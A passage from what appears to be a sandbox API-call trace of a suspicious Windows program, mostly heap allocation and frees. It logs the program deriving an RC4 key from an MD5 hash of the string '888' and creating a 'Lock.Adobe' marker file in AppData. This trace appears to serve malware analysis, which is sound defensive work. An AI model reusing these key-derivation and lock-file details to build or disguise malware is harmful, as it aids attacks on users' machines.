(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0152.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0152.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.996] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa870 [0152.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.996] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0152.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.996] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.996] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0152.996] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.997] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0152.997] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.997] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0152.997] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.998] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.998] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0152.998] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0152.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0152.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0152.999] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0152.999] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0152.999] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.999] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0153.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7160, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0153.000] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bec48) returned 1 [0153.001] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.001] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0153.001] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0153.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0153.001] CryptCreateHash (in: hProv=0x9bec48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0153.002] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0153.002] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.002] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0153.002] CryptHashData (hHash=0x9e1af8, pbData=0x2a71af8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0153.002] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.002] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.002] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0153.002] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0153.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0153.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaabb8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0153.002] CryptDeriveKey (in: hProv=0x9bec48, Algid=0x6601, hBaseData=0x9e1af8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1b78) returned 1 [0153.002] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.012] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0153.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7120, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0153.012] CryptDestroyHash (hHash=0x9e1af8) returned 1 [0153.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\adobe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.013] GetLastError () returned 0x5 [0153.013] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0153.014] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Adobe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.adobe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0153.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0153.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0153.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0153.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0153.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0153.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0153.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0153.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 